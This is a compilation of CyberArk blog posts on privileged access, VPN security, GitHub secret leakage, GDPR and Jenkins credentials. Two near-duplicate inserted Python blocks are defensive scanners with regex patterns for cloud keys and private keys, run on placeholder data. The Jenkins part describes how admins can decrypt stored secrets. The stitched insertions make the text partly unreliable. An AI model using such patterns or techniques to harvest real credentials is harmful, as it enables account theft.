In our on-demand webinar, “Top 10 Security Projects for Security and Risk Management Organizations,” featured presenter Gartner VP and Distinguished Analyst Neil MacDonald outlines a risk-prioritized approach that places an emphasis on technology projects that maximize risk reduction for the resources required to deploy them. Register here to explore five of Gartner’s top security recommendations – including PAM.

 

1Gartner. “Best Practices for Privileged Access Management Through the Four Pillars of PAM.” Michael Kelley, Felix Gaehtgens. 28 January 2019.

]]>
These VPN Configurations Could Be Your Weak Spot https://www.cyberark.com/blog/these-vpn-configurations-could-be-your-weak-spot/ Wed, 17 Apr 2019 18:42:55 +0000 https://www.cyberark.com/?p=105925

Using virtual private network (VPN) client certificates and authentication cookies can help increase VPN security and improve the user experience by reducing the need to enter or re-enter a password. However, the use of these authentication methods can be like leaving your keys in the front door.

Malicious cyber attackers may hack a client computer and use its VPN client certificate or authentication cookie, or use the poorly secured session cookies on another machine, to bypass password authentication. Web-based or SSL VPN may also have certificate bypass vulnerabilities. When the key is already in the door, who needs to steal the password?

Take these steps to help ensure your VPN is not a security weak spot:

1. Secure the remote client computer by installing and enabling on the workstation:

  • A firewall
  • Anti-malware
  • An anti-theft or MDM/EMM solution. CyberArk Idaptive’s Device Security Management can remotely wipe stolen Windows 10, MacOS, iOS and Android devices.
  • Device security policies that fit your organization, such as screen lock when idle, blocked USB ports and other OS hardening settings.
  • Multi-Factor Authentication for computer login. CyberArk Idaptive’s Multi-Factor Authentication for Login can offer different two-factor choices such as phone call, SMS, push notification mobile app, security question, email and OATH OTP. We also offer offline two-factor authentication when internet is not available.

2. Make sure VPN session time-outs are not too long.

3. Promptly address known vulnerabilities in your VPN solution. Keep your VPN solution up-to-date or, in some cases, downgrade to work around a bug.

4. Integrate an MFA solution with your VPN solution. In the event the VPN client certificate or session cookie is used to bypass authentication, or the user’s password has been compromised, hackers will still be prompted for multi-factor authentication as the last line of defense. CyberArk Idaptive’s MFA for VPN can integrate with both VPN thick clients and web-based VPN.

This video demonstrates two-factor authentication being prompted even when a VPN authentication cookie is being used.

Using VPN client certificates and authentication cookies has security benefits, but it also creates openings that allow cyber attackers to bypass authentication. To close these openings, protect the VPN client devices from being compromised and enforce MFA on your VPN so that a stolen certificate, cookie or password is not enough on its own.

]]>
Privileged Account Management Best Practices for Social Media Security https://www.cyberark.com/blog/privileged-account-management-best-practices-for-social-media-security/ Tue, 16 Apr 2019 13:00:20 +0000 https://www.cyberark.com/?p=51424

Social media plays a vital role in an enterprise’s marketing strategy, helping to build brand awareness, provide real-time customer support and launch new products faster than ever before. Social media has also emerged as a critical tool for governments – from individual politicians and elected officials to official accounts of government agencies and organizations – to communicate with citizens. Yet, while social media allows for the rapid dissemination of information, it has a dark side — which makes strong social media security a necessity.

Examples and consequences of social media security breaches

Using methods such as dictionary attacks, social engineering and phishing, motivated cyber attackers target and steal social media account credentials, using them to hijack corporate and government accounts. Such account takeovers can lead to the unauthorized publishing of malicious content, confidential information and personal data. Social media attacks can lead to reputational damage, compliance violations, identity theft, loss of customer trust and significant financial implications.

For example, in 2018, residents of Hawaii and Japan received a frightening alert indicating that a ballistic missile was heading to the islands and warning people to take shelter. It took 38 minutes for the false alarm to be retracted, during which time residents took to social networks – particularly Twitter – in a panic about their personal safety. A year prior, amidst diplomatic controversy between Turkey, Germany and the Netherlands, a common Twitter tool enabled cyber attackers to hijack many high-profile organization and individual user accounts and tweet offensive propaganda from them. Previously, a group of hackers hijacked the Twitter and YouTube accounts of the US military’s Central Command and posted a series of threatening messages, propaganda videos and military documents. Around the same time, a single unauthorized tweet on the Associated Press’ Twitter account (which has more than 13 million followers) caused the stock market to plummet by $136.5 billion within minutes.

These examples provide a glimpse of how, without effective social media security, external cyber attackers can use social media accounts to spread chaos. But, significant damage can also come from insider threats – people who have, or once had, authorized access to an organization’s social media accounts. This happened to a UK-based music and film retailer. After a large layoff, an ex-employee (and former corporate social media manager) commandeered the company’s Twitter account and posted a defamatory tweet before her social media credentials were revoked.

The overlooked threat: Shared privileged accounts for social media platforms

A typical enterprise organization has multiple (sometimes hundreds of) corporate social media accounts – Twitter, Facebook, Instagram, YouTube, LinkedIn and other outlets, each with their own unique accounts for different product lines, languages, countries and stakeholders. Typically, multiple people manage and access each of these accounts on a regular basis.

To simplify workflows across channels, users, office locations and time zones, these social media accounts are typically set up as shared privileged accounts. Passwords are often shared across teams and even third-party contractors, and are rarely (if ever) changed, making them easy targets for external attackers and malicious insiders.

Since social media credentials are typically deemed “low risk” because they don’t enable access to sensitive financial or customer data, security is typically lax, with no record or accountability for who is responsible for each post. Worse still, many companies have no idea who actually has access to their social media accounts and passwords at any given moment.

Six ways to mitigate the risk of social media cyber attacks with privileged access management

To properly secure and protect social media accounts from security threats and cyber attacks, they should be viewed as privileged accounts and best practices for privileged access management must be implemented to mitigate the risk of compromise. These include:

  1. Securely store credentials. Improve social media security by protecting social media account credentials from account takeovers by storing passwords in a centralized, secure digital vault. This reduces the ability of an attacker or malicious insider to take control over the social media accounts.
  2. Enable transparent access. Allow authorized users to connect directly to various social media platforms, enabling them to authenticate to accounts without knowing the actual passwords. This makes it difficult for attackers to discover and steal privileged credentials while balancing security and operational requirements.
  3. Eliminate shared credentials. Storing passwords in a digital vault requires users to log in individually for access, eliminating the accountability challenges of shared credentials. Additionally, creating policy around which users can access which social media accounts mitigates the risk of credential-based cyber attacks.
  4. Automate and enforce password changes. Ensure that each password is changed on a regular basis (as frequently as every use). This reduces the chance of an outsider stealing and using a valid credential to wreak havoc.
  5. Trace account activity. Create a record of activity on social media accounts to trace all posts directly back to individual authorized users. This helps identify weak areas of security as well as rogue employees who may be posting damaging content. Furthermore, recording social media account sessions provides further proof for an audit trail of exactly who did what within each individual account.
  6. Assign risk scoring to sessions. Pre-defining high-risk activities within social media sessions enables automated alerting of security operations teams so that they can quickly assess the situation and take necessary action. This also helps prioritize the audit and review of social media sessions based on risk.

The threat to social media is very real and the risks are increasing. It’s time to protect your social media accounts from takeovers. The CyberArk Privileged Access Security Solution can play a critical role in protecting access to social media networks, preventing embarrassing incidents and stopping cyber attacks before irreversible damage can be done to your business. Learn more by downloading our solution brief.

]]>
GitHub Repositories Leak Thousands of Secrets, Study Shows https://www.cyberark.com/blog/github-repositories-leak-thousands-of-secrets-study-shows/ Thu, 11 Apr 2019 13:00:09 +0000 https://www.cyberark.com/?p=49657

In case you were ever in doubt about how well users are protecting credentials in GitHub repositories and other code repositories, researchers at North Carolina State University recently discovered many thousands of leaked secrets and credentials.

I spoke with CyberArk Lab’s Security Research Team Lead Lavi Lazarovitz (@__Curi05ity__) to get a better understanding of how serious this situation is, who it will affect and whether we’re looking at the beginning of a larger trend. But, first some background:

The North Carolina State University researchers Michael Meli, Matthew McNeice and Bradley Reaves scanned billions of GitHub files as part of an academic study that found that over 100,000 of the service’s code repositories contain exposed authentication secrets, such as cryptographic keys and API tokens, and thousands more repositories are leaking new, unique secrets every day. Researchers scanned nearly 13% of GitHub’s public repositories to collect this information.

The researchers used two approaches to identify leaked secrets. The first method was querying a GitHub repository search engine for a period of almost six months. According to the paper, this was a means of discovering in real time 99% of newly committed files containing secrets. The second method used BigQuery – a web service for analyzing massive datasets – to query a weekly snapshot of GitHub activity, which is what provided the researchers with their scan of 13% of GitHub’s public repositories.

In their scan, the researchers found 85,311 unique Google API keys, 37,781 unique RSA Private Keys and 47,814 unique Google OAuth IDs. The researchers also estimated that of the secrets enabled access to sensitive systems or data and their exposure caused real risk.

How serious a problem is this?

Lazarovitz: It clearly highlights a huge and very real problem. While the researchers didn’t release the names of specific organizations with exposed secrets, they did share that they were dealing with some large, prominent organizations. This included AWS credentials for a site used by millions of college applicants in the U.S. and AWS secrets for a major government agency in a Western European country.

The other significant finding from the study was that 81% of the secrets discovered took two weeks or longer to be removed. This means that the developers using these sensitive secrets probably weren’t aware that their secrets were exposed or drastically underestimated the risk this poses. Furthermore, even developers who were aware of the exposed keys and the need to keep them safe might delete the key, but fail to wipe the entire GitHub repository. In this case, the keys could still be found in the GitHub repository’s commit history, which holds changes made to the GitHub repository – including deleted keys.
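Two points above are worth seeing in code: the secret types the study counted (Google API keys, RSA private keys, Google OAuth client IDs) are recognisable by pattern, and a key deleted in the latest commit is still sitting in every earlier commit that contained it. The block below is an added example, not the researchers’ tooling and not CyberArk’s code: a small scanner that applies those patterns (plus one for AWS access key IDs) to each commit’s files and then reports which leaked tokens are gone from the head commit but remain in history. The Shannon-entropy filter, the repository contents and every token in them are constructed for the example; the tokens are placeholders, not real credentials.

```python
"""Added example (not the NCSU study's scanner, not CyberArk's code): pattern-based
secret detection over a repository's commit history. All data is constructed."""
import math
import re
from collections import Counter

# Patterns for the secret types the study reports, plus AWS access key IDs.
PATTERNS = {
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "google_oauth_id": re.compile(r"\b[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "rsa_private_key": re.compile(r"-----BEGIN RSA PRIVATE KEY-----"),
}
MIN_ENTROPY = 3.0  # assumption: bits/char below which a match is treated as a placeholder


def shannon_entropy(s):
    """Bits per character; low values mean repeated characters, i.e. dummy values."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def find_secrets(text):
    """Return (kind, token) pairs found in one file's contents."""
    hits = []
    for kind, pat in PATTERNS.items():
        for m in pat.finditer(text):
            token = m.group(0)
            # The PEM header is a fixed string; everything else gets the entropy filter.
            if kind != "rsa_private_key" and shannon_entropy(token) < MIN_ENTROPY:
                continue
            hits.append((kind, token))
    return hits


def scan_history(commits):
    """commits: list of (sha, {path: content}) oldest first. Every commit is scanned,
    so a token removed in a later commit is still reported for the commit that held it."""
    findings = []
    for sha, tree in commits:
        for path, content in tree.items():
            for kind, token in find_secrets(content):
                findings.append({"commit": sha, "path": path, "kind": kind, "token": token})
    return findings


def removed_from_head(findings, commits):
    """Findings whose token no longer appears in the newest commit: deleted, not purged."""
    head_text = "\n".join(commits[-1][1].values())
    return [f for f in findings if f["token"] not in head_text]


# Constructed two-commit repository: c1 hard-codes secrets, c2 "fixes" it by deleting them.
SAMPLE_COMMITS = [
    ("c1", {
        "config.py": 'GOOGLE_KEY = "AIzaSyExampleKey0123456789abcdefghijklm"\n'
                     'AWS_KEY = "AKIAEXAMPLE0000ABCD1"\n',
        "deploy/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\n"
                         "(constructed, truncated key body)\n"
                         "-----END RSA PRIVATE KEY-----\n",
    }),
    ("c2", {
        "config.py": 'import os\nGOOGLE_KEY = os.environ["GOOGLE_KEY"]\n'
                     'AWS_KEY = "AKIAAAAAAAAAAAAAAAAA"  # placeholder, filtered by entropy\n'
                     'OAUTH_CLIENT = "123456789012-abcdefghijklmnopqrstuvwxyz012345'
                     '.apps.googleusercontent.com"\n',
    }),
]


def scan_sample_history():
    """Scan the constructed repository; returns (all findings, findings only in history)."""
    findings = scan_history(SAMPLE_COMMITS)
    return findings, removed_from_head(findings, SAMPLE_COMMITS)


if __name__ == "__main__":
    all_hits, history_only = scan_sample_history()
    for f in all_hits:
        print(f"{f['commit']} {f['path']}: {f['kind']}")
    print(f"{len(history_only)} secret(s) deleted from HEAD but still in history")
```

Against a real repository the `commits` list would be built by walking `git log` and reading each blob, and the finding is the same: the three secrets deleted in c2 are still recoverable from c1, which is why rotation, not deletion, is the only fix once a key has been committed.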

Why are secrets and credentials exposed in GitHub and leaked? What are the repercussions of GitHub repositories leaking secrets?

Lazarovitz: Developers write code and scripts which become part of the build or manage the build. The code and scripts typically need secrets and other credentials to do their work interacting with other applications, with other tool chains in the CI/CD pipeline, accessing cloud resources and so on. The code and scripts are, of course, version controlled and stored in code repositories. DevOps processes require speed and agility, which effectively makes GitHub repositories and other code repositories an essential part of the CI/CD pipeline. But, that’s not the problem; the problem is there is very little security or oversight for how these credentials are managed or protected. It’s too easy for developers to hardcode credentials and, once the code is marked public, the organization’s cloud access keys are now in the public domain. An easy mistake for a developer to make when their primary focus is getting the next new feature out to customers.

What do you recommend GitHub users do to keep their keys secure? What behaviors and technologies are necessary to use GitHub responsibly?

Lazarovitz: There are some easy fixes, and many organizations do seem to be proactive. First and foremost, I’d strongly recommend never embedding credentials in code. Hardcoding secrets and credentials in code is a terrible business practice and the easiest thing to mitigate. Hardcoded credentials are one of the most common ways for credentials to leak to a repo. Instead, secure and manage credentials in a vault and use API calls or other mechanisms to securely use them. Ideally, secrets would never be exposed in an application. Other important controls to limit the privileged attack surface include changing or managing credentials on a regular basis or after use, or using short-lived or temporary tokens that are valid for a limited time. There are many valid approaches to take control.

Is this an example of a larger problem or trend? Is this kind of thing something we should expect to see more of?

Lazarovitz: As more and more organizations turn to using external services, repositories and resources, whether as part of their digital transformation or as cloud-native, we should, unfortunately, expect the credential leakage to grow. Basically, if credentials are hardcoded, the cost of a misconfigured code repository, build pipeline or other tool in the tool chain is exposed IP and credentials, so every organization that is migrating code or apps using a GitHub repository or other code repository, DevOps or similar processes adds to the probability that credentials will leak.

What can attackers who get their hands on these keys do with them? What are they most likely to do with them?

Lazarovitz: Public repos are available to the whole world and don’t require great skill to scrape – hacking tools are readily available for attackers to put to misuse. And they do – attackers regularly troll GitHub, for example, for cloud access keys and other easily monetized credentials. They can also look at the history of code commits to find exposed credentials. The first attackers to find unprotected credentials are mostly opportunistic attackers that use the cloud access keys to take over compute resources to run crypto miners for immediate profit. In other cases, the attackers might sell the data or encrypt the data and ask for ransom.

What are your key takeaways? Should organizations avoid code repositories?

Lazarovitz: Of course not. GitHub repositories and code repositories, whether private or public, are an essential part of the application development process. Instead, organizations need to establish processes and approaches to avoid hardcoding credentials in the first place, or even storing credentials on GitHub. Basically, as the research highlights, organizations and individuals are, for whatever reason, exposing potentially valuable credentials to the public and to attackers. Please don’t, as many organizations have found that it does not end well.
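Two of the points made in this interview, that a key "deleted" from a file is still sitting in the commit history, and that credentials should be retrieved at runtime from a vault or secret store rather than hardcoded, are worked through in the example below. It is an added example and not code from the interview or from any CyberArk tooling. The commits, shas and keys are constructed; the only real-world fact it relies on is the shape of an AWS access key ID (the string "AKIA" followed by 16 upper-case alphanumeric characters).

```python
"""Scan a repository's commit history for AWS access key IDs.

Added example, not code from the interview or from CyberArk. The commits,
shas and keys below are constructed. The only real-world fact relied on is
the shape of an AWS access key ID: "AKIA" followed by 16 upper-case
alphanumeric characters.
"""
import os
import re
from dataclasses import dataclass

AWS_ACCESS_KEY_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")


@dataclass
class Commit:
    sha: str      # constructed placeholder, not a real commit id
    message: str
    patch: str    # unified-diff body: '+' added lines, '-' removed lines


# Constructed history: a key is committed, later "removed", and a second key
# is committed in a .env file and never removed.
SAMPLE_HISTORY = [
    Commit("c0ffee01", "Add S3 uploader",
           '+++ b/config.py\n'
           '+AWS_ACCESS_KEY_ID = "AKIAEXAMPLEKEY000001"\n'
           '+BUCKET = "build-artifacts"\n'),
    Commit("c0ffee02", "Stop hardcoding the AWS key",
           '--- a/config.py\n'
           '+++ b/config.py\n'
           '-AWS_ACCESS_KEY_ID = "AKIAEXAMPLEKEY000001"\n'
           '+AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]\n'),
    Commit("c0ffee03", "Add local env file",
           '+++ b/.env\n'
           '+AWS_ACCESS_KEY_ID=AKIAEXAMPLEKEY000002\n'),
]


def find_exposed_keys(history):
    """Return (sha, kind, key) for every key visible anywhere in the history.

    A '-' line means the key was deleted from the working tree, but the commit
    that introduced it is still there, so the key is still recoverable by anyone
    who reads the history. Removed lines are therefore reported as well.
    """
    findings = []
    for commit in history:
        for line in commit.patch.splitlines():
            # Skip context lines and the file-name header lines (+++ / ---).
            if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
                continue
            kind = "added" if line[0] == "+" else "removed"
            for key in AWS_ACCESS_KEY_RE.findall(line):
                findings.append((commit.sha, kind, key))
    return findings


def keys_deleted_but_still_in_history(history):
    """Keys that a later commit removed from the tree yet remain in history."""
    findings = find_exposed_keys(history)
    added = {key for _, kind, key in findings if kind == "added"}
    removed = {key for _, kind, key in findings if kind == "removed"}
    return sorted(added & removed)


def load_aws_key_from_environment(env=None):
    """Fetch the key at runtime from an environment variable that a vault or
    CI secret store injects, so nothing sensitive is ever committed. Fails
    closed: a missing variable is an error, never a fallback to a literal."""
    env = os.environ if env is None else env
    key = env.get("AWS_ACCESS_KEY_ID")
    if not key:
        raise RuntimeError("AWS_ACCESS_KEY_ID was not provided by the secret store")
    return key


if __name__ == "__main__":
    for sha, kind, key in find_exposed_keys(SAMPLE_HISTORY):
        print(f"{sha} {kind:7s} {key}")
    print("deleted but recoverable:", keys_deleted_but_still_in_history(SAMPLE_HISTORY))
```

Run against the constructed history, the scanner reports the first key twice (once added, once removed) and the second key once; the "deleted but recoverable" list contains the first key, which is exactly the case the interview describes. In a real repository the same logic would be fed the output of the version control tool's history rather than the constructed patches, and the check belongs in a pre-commit hook or pipeline stage so a key never reaches a public repository in the first place.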

To learn more about CyberArk Labs research, visit the Threat Research Blog.

CyberArk Named a 5-Star Security Vendor in 2019 CRN Partner Program Guide https://www.cyberark.com/blog/cyberark-named-a-5-star-security-vendor-in-2019-crn-partner-program-guide/ Wed, 10 Apr 2019 13:00:26 +0000 https://www.cyberark.com/?p=49401

CyberArk is honored to be named a 5-Star Security Vendor – the highest rating in CRN’s 2019 Partner Program Guide. This marks the second consecutive year that CyberArk has received this prestigious designation. This recognition highlights the importance of privileged access management (PAM) as a top security control and enterprise priority. Organizations that are extending PAM to users and applications across the enterprise, in the cloud, throughout the DevOps pipeline and at the endpoint are realizing rapid risk reduction and strong business impact.

CyberArk received a 5-Star rating based on an in-depth assessment of channel program offerings, partner profitability, partner training, education and support, marketing programs and resources, sales support and communication.

CyberArk has built a powerful channel partner community to help customers around the world to reduce risk, protect against advanced cyber threats and securely embrace digital transformation strategies. This recognition comes on the heels of CyberArk’s Scott Whitehouse being named a CRN Channel Chief.

We believe that protecting high-value assets and data in today’s increasingly complex business environment requires high levels of innovation and collaboration. Our partner ecosystem brings together the strengths of advisory consultants, global systems integrators and regional solutions providers to deliver the industry’s most complete privileged access management solution. We’re honored to be recognized by CRN for our commitment to cybersecurity innovation and channel partner empowerment.

CRN’s annual guide identifies the strongest and most successful partner programs offered by the top IT products and services suppliers. Solution providers have come to rely on this world-class guide as they evaluate security providers they work with or are considering working with in the future. The 5-Star rating recognizes an elite subset of companies that empower solution providers with the best partner program offerings.

The 2019 Partner Program Guide will be featured in the April issue of CRN and is available online here. To learn more about the CyberArk Global Partner Program, visit here.

Google Cloud Identity and CyberArk: Supercharging BeyondCorp https://www.cyberark.com/blog/google-cloud-identity-and-cyberark-supercharging-beyondcorp/ Tue, 09 Apr 2019 13:00:30 +0000 https://www.cyberark.com/?p=49366

Today’s workplace is transforming rapidly. With the rise of BYOD for business and cloud services for work, user expectations are changing dramatically. As a result, enterprises are shifting core productivity apps and data to the cloud to create a more connected and collaborative work environment.

In this cloud-first era, access is no longer limited to an organization’s office or employees. Customers, third-party vendors, remote employees and partners must all be able to access data and applications in real time to keep business moving. But, this means that organizations must shift away from a perimeter or firewall-based security approach to access policies based on device information, device health and the associated user.

Google Cloud Identity from Google Cloud provides enterprises with a simple, secure and reliable way to protect user accounts and centrally manage access to apps from virtually any device, anywhere. The platform brings Google’s BeyondCorp model – a zero-trust security framework that requires every request to data or applications to be encrypted, authenticated and authorized – to organizations everywhere.

Today, we are thrilled to share that the CyberArk Privileged Access Security Solution now integrates with Google Cloud Identity, providing organizations with strong cybersecurity for the new “identity perimeter.” The integrated solution uses intelligent, unobtrusive security to ensure that only authorized, privileged users can access sensitive data and accounts – without negatively impacting user experiences.

By integrating the CyberArk solution into Google Cloud Identity, organizations have a single pane of glass for visibility and unified administration of privileged users, applications and devices. The CyberArk solution enables organizations to efficiently manage privileged accounts, credentials and access rights, while proactively monitoring and controlling privileged access activity. Through a SAML integration, Google Cloud Identity’s strong multi-factor authentication (MFA) and security key support (including the Titan Security Key) provide adaptive, strong authentication and easy single sign-on (SSO) across all CyberArk applications by enforcing policies based on device, user and contextual attributes. This integral security layer helps organizations reduce identity sprawl by restricting access to services, while ensuring only authorized privileged users can access their accounts.

With CyberArk integrated with Google Cloud Identity, organizations can manage user lifecycles and devices, enable SSO to thousands of apps, automatically provision and de-provision accounts in SaaS apps – including G Suite and Salesforce – connect to an on-premises directory and view actionable reports. The solution is a win-win for both end-users, who can easily access work apps and files on their favorite devices, and IT security teams, who can tackle the identity management and privileged access management needs of their entire organization at scale, with ease.

To learn more and access the Google Cloud Identity and CyberArk integration, visit the CyberArk Marketplace. And to explore CyberArk’s comprehensive cloud security offerings, visit here.

GDPR Breach Notification By Country: 59,000 Incidents Reported https://www.cyberark.com/blog/gdpr-breach-notification-by-country-59000-incidents-reported/ Thu, 04 Apr 2019 16:10:22 +0000 https://www.cyberark.com/?p=46713 GDPR breach notification distribution

In May, it will be a year since the enforcement of the EU GDPR began. In the midst of continued and ever growing confusion within the EU caused by the Brexit process, a recent report around another high profile EU issue may have gone unnoticed. DLA Piper recently released a paper looking into incidents reported — both GDPR breach notification and other kinds of notification — fines enforced and how reports and fines are spread out across EU members.

From the time GDPR was introduced to the point when the report was released, 59,000 incidents were reported to the various regional “Data Commissioners,” such as the CNIL in France. The numbers were built upon data reported by EU members (which still includes the UK as I write this) and collected by DLA Piper, but it is important to note that not all countries expose such information.

Firstly, before discussing these numbers, we need to be clear that these incidents do not imply 59,000 data breaches. Because GDPR is concerned not only with data breaches, but also with the inappropriate handling and processing of data, EU countries are required to engage in more than just GDPR data breach notification. The reported number of incidents, therefore, covers data abuse as well as data loss, whether accidental or maliciously derived. A separate source, directly from the EU commission, places the data breach related incidents at 41,500 for both malicious and accidental events.

The effects and legalities of GDPR are still rippling their way through data processing services. As a recent example, lobbyists from several countries launched a petition to their respective regional Data Protection Authorities on how EU personal data is used in the fast growing space of Real-Time Bidding, which is the process that determines which adverts are shown to you online. Real-Time Bidding is driven by the data advert companies have about you, since this is what allows them to make the most informed decision as to which advertisement you would find most appealing. The decision of which advert to show you is made in a split second and, therefore, there is clearly no possible way for the user to ‘opt in’ to the processing of their data. This is separate from the 50 million euro fine placed on Google by the French CNIL earlier this year.

One very interesting element of the DLA Piper report is the breakdown by country of the number of incidents filed. The Netherlands tops the list with around 15,400 reported incidents. Strangely, despite having a population nearly three times that of the Netherlands and a similar difference of scale in GDP, France only reported 1,300 incidents – over 14,000 fewer! This, perhaps, highlights an inconsistency between EU members as to what needs to be reported. For example, reported incidents have included simple notification that an email was accidentally sent to the wrong recipient. It would appear, although it is not confirmed, that the Dutch are playing it safe and reporting any infringement, whereas the French and Italians (with 610 incidents reported in Italy) have a narrower interpretation of what a data incident is.

Potentially, the reporting of even mild infringements could explain why only 91 fines have resulted from the 59,000 reported incidents. However, the report from DLA Piper does concede that there is likely to be a backlog within the EU commission to process GDPR breach notification and other types of incidents, which could mean that more fines will be forthcoming. The backlog may also be a sign that the EU underestimated the initial volume of incidents it would receive.

The main thing that is evident from this report is that the effect of the GDPR is still not fully understood. This is reflected by the huge variance in reported incidents per country and the ongoing arguments around the interpretation of legal data processing. The implications and interpretations will continue to play out for the foreseeable future.

One thing remains clear, organisations (with a deliberate UK spelling) who are the controller or processor of EU related data need to protect this information and its usage with a specific mind-set. The data is not theirs; it belongs to the individuals to whom it is linked. Organisations must treat the data as something they are borrowing or looking after, not something they own. It needs to be locked away with the right protection to ensure only those who should use it or see it can do so. It may seem like an obvious shift of perception, but it’s vital in terms of the importance we place upon protecting EU-related data.

Jenkins Credentials Management: Red vs. Blue https://www.cyberark.com/blog/red-vs-blue-best-practices-for-jenkins-credentials-management/ Tue, 02 Apr 2019 14:12:37 +0000 https://www.cyberark.com/?p=41900 Red vs. Blue: Jenkins Credentials Management

Red vs. Blue: Best Practices for Jenkins Credentials Management

Over the past year, CyberArk Labs has conducted extensive research on Jenkins – an open source automation server used to accelerate the software delivery process. With more than 223,000 active installations worldwide, Jenkins is considered the de facto standard in open source continuous integration tools, effectively acting as the DevOps engine, or “butler,” and addressing everything from source code management to delivering code to production. Because of this, it’s no surprise that Jenkins needs unconstrained access to privileged credentials – or secrets – to do its job. These secrets are prime targets for cyber attackers. If exploited, secrets may allow attackers to take full control of an organization’s IT infrastructure, disable security controls, steal confidential information, commit financial fraud and disrupt operations.

Our goal with this Jenkins research was to educate organizations on potential security risks around unmanaged secrets and misconfigured environments, and share best practices for protecting privileged access while maintaining DevOps velocity. In our recent webinar, Red vs. Blue: Best Practices for Jenkins Credentials Management, we showcased research highlights and demonstrated several common attack techniques using Red and Blue Team tactics, including the ones below. For an in-depth look, tune in to the on-demand webinar.

External Attackers

  • Red Team: Last February, reports emerged that attackers had successfully exploited an unpatched Jenkins vulnerability, stealthily mined Monero coins for about 18 months, and ultimately made $3 million in one of the biggest malicious cryptocurrency mining operations of all time.
  • Blue Team: To protect against outsider threats, such as crypto mining attacks, organizations must treat their Jenkins master as a fortress – constantly protecting, monitoring and auditing it. Further, staying on top of regular patches for Jenkins software and plugins is a must. While this cybersecurity hygiene practice should be table stakes, thousands of Jenkins installations have not yet been patched, meaning the software remains vulnerable.

Malicious Insiders: The Jenkins Admin

  • Red Team: Jenkins secrets are protected by encryption and may not be exposed. Same goes for Jenkins API tokens and other credentials stored in Jenkins. But can Jenkins keep its secrets from its admin? Unfortunately, the answer is no. Red Teamers will quickly discover that Jenkins admins have access to all of this critical information. Using the Script Console, admins can run code on any machine controlled by Jenkins – including the Jenkins master – to decrypt secrets and display them in clear text.
  • Blue Team: The Jenkins admin is a very powerful user in Jenkins. To help mitigate the risk of an insider attack, organizations should extract secrets from Jenkins to the furthest extent possible, placing them in a centralized vault where they can be secured, rotated and controlled. To keep any one person from having all of the secrets, use multiple access tokens stored in different repositories. In extreme cases, use two Jenkins infrastructures, for example, one server for dev and another one for production. You can learn more about this here.

Malicious Insiders: Malicious Pipeline Config User

  • Red Team: The Jenkins pipeline is a suite of Jenkins plugins supporting the implementation of continuous delivery automation in Jenkins. It is a computer-readable expression of all software build stages: build, test and deploy. If a malicious insider has control over a pipeline – either via the Jenkins web user interface or by controlling the Jenkins file – they can request secrets using the functionality provided by the Jenkins credentials binding plugin and receive them in clear text.
  • Blue Team: One way to mitigate risk is to limit the scope of credentials for specific pipeline jobs. Set up the Jenkins folders plugin so that pipelines in one folder cannot access the secrets in another folder.

Interested in learning more? You can check out our full Jenkins research series on the CyberArk Threat Research Blog (or in the individual links below). There you’ll review the Jenkins vulnerabilities discovered by CyberArk Labs and subsequently addressed by CloudBees, examine weaknesses of misconfigured environments and explore best practices for configuring privileged credentials and securing web start agents and plugins:

What March Madness Can Teach Us About Handling a Data Security Breach https://www.cyberark.com/blog/what-march-madness-can-teach-us-about-handling-a-data-security-breach/ Fri, 29 Mar 2019 13:00:45 +0000 https://www.cyberark.com/?p=40493

With March Madness now fully upon us, it’s time to take a few lessons learned from “The Tournament” and apply them to our lives in cyber security. What can March Madness teach us about handling a data security breach?

Lesson 1: Don’t let every month be like March

Last March, CNBC ran a story about how loss of worker productivity during March Madness accounted for roughly $6.3 billion in corporate losses. Just in that month alone! Maintaining worker productivity is a top priority for managers, HR and corporate teams everywhere and it’s clear that time spent watching your bracket get busted means not focusing on other priorities – like customer service and generating revenues.

In business, if critical systems are down, or if workers aren’t able to do their jobs due to operational downtime, then money is similarly lost. The Ponemon Institute, in their 2018 report on the costs of data security breaches, stated that the global cost of a data security breach averages $3.86 million. Keeping business critical systems, applications and accounts up and running is crucial and it’s something that malicious actors often aim to disrupt. In the most common method, the attacker abuses privileged access and jumps laterally until he reaches what he’s looking for. Security teams should have plans in place to define and secure the systems that are most pivotal to business continuity and success so that they don’t contribute to business losses in the event of a data security breach.

Lesson 2: Beware the underdog

Every year, it’s the same story. Some lower ranked team that nobody saw coming knocks off a highly favored powerhouse (sorry Virginia fans). The story runs something like this: anonymous small-town school gets hot from behind the 3-point line and the favorite is unable to recuperate. It happens every year without fail.

Just as no one ever expects to find their favorite team knocked out by a team from nowhere, in security there’s a tendency to assume that, while a data security breach can happen, there’s no way this could happen to us. In a recent study conducted by CyberArk1, 72% of IT and business stakeholders believe that they can stop an impending data security breach. Whether it’s because of the industry or vertical market they’re in, or the size of the company, no organization thinks that it could possibly happen to them. Until it does.

That same study also indicated that 76% of organizations reported an issue that affected the confidentiality, integrity or availability of their business critical applications in the last 24 months. With an ever-changing threat landscape that’s getting harder and harder for IT and security teams to manage, expect the unexpected and assume that someone or something will land on your network, and on a fast track to your most valuable assets and information. What you do once the attacker gets inside is the real difference between a win and a loss.

Lesson 3: Eventually, the blue bloods reign supreme

Everyone loves a good Cinderella story, especially this time of year. However, the dirty secret is that, when filling out your bracket, you should pick one of the favorites. With only four exceptions, a team that’s been seeded one, two or three has won the National Championship, and nearly 75% of all teams that have ever appeared in the Final Four have been seeded in the top three. That’s because, to be picked as a favorite, they’re typically an experienced team that already knows how to get the job done. While it’s fun to pick the underdog because you like the school’s mascot, when picking the later rounds, you’re typically better off picking the higher ranked, more experienced team to advance.

Experience matters in business just like it matters on the court. Whether it’s a championship game or a post-breach environment, teams and organizations who already know the score in high pressure situations are the ones who perform best on game day. They know how to keep calm in a tight spot, focus, block out the noise and make the strategic decisions to win the game. When the pressure is on, you want someone who has been there before.


1 CyberArk EMEA Business Critical Application Survey, 2019

